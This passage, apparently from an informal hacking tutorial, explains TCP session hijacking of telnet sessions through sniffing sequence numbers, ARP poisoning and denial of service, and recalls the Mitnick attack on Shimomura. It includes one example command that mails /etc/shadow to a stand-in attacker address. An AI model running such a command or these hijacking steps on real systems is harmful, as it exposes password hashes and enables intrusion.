4: IP hijacking
Lets suppose I'm an ordinary computer user,i dont have security knowlegdes
and i dont see the difference between telnet and ssh.I use telnet from home
to start a session to my server. I enter my username and password.Then i
will exchange datas to server without any form of authentification. An
attacker being able to sniff around,will grab my SEQ/ACK numbers, reset my
connection using arp poisoning and then will insert commands in my place.
He can place easily a backdoor on my server!!(mail
evil@hackers.com
< /etc/shadow it's enough
But to stop ACK storm interfering with his
attack,a hacker must DoS me using arp poisoning or any other DoS method
like SYN flooding. Remember how Kevin Mitnick hacked Shimomoura's network?
Shimomoura was using rlogin becasue being the only owner of the network,
he trusted every computers from within. Mitnick,situated outside the
trusted zone,he impersoanted one of the trusted machines.
He easily guessed seq/ack's because the older software was vulnerable to
ID predictions. Today,DNS cache poisoning/IP spoofing from the internet is
hard because the right ID is very hard to predict.But,there is arp
spoofing
.And i think that multithreaded bruteforcer will work, if you
are lucky enough